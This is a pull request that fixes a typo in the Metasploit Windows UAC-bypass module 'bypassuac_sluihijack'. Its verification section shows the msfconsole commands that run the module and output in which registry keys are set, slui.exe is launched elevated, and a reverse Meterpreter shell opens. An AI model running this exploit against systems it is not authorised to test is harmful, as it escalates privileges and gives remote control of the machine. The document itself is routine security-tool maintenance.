### PR TITLE
Update bypassuac_sluihijack: Fix typo

### DIFF
--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     handler(client)
 
-    print_status("Cleaining ...")
+    print_status("Cleaning up ...")
     unless exist_delegate
       registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
     end


### PR DESCRIPTION
Tiny typo fix. 

## Verification

List the steps needed to make sure this thing works

```
msf > use exploit/windows/local/bypassuac_sluihijack
msf exploit(windows/local/bypassuac_sluihijack) > set SESSION 1
SESSION => 1
msf exploit(windows/local/bypassuac_sluihijack) > set target 1
target => 1
msf exploit(windows/local/bypassuac_sluihijack) > run

[*] Started reverse TCP handler on 10.10.10.10:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: powershell Start-Process C:\WINDOWS\System32\slui.exe -Verb runas
[*] Sending stage (206403 bytes) to 10.10.10.20
[*] Meterpreter session 3 opened (10.10.10.10:4444 -> 10.10.10.20:49675) at 2019-06-26 21:24:01 +0000
```
[*] **Cleaining** ...
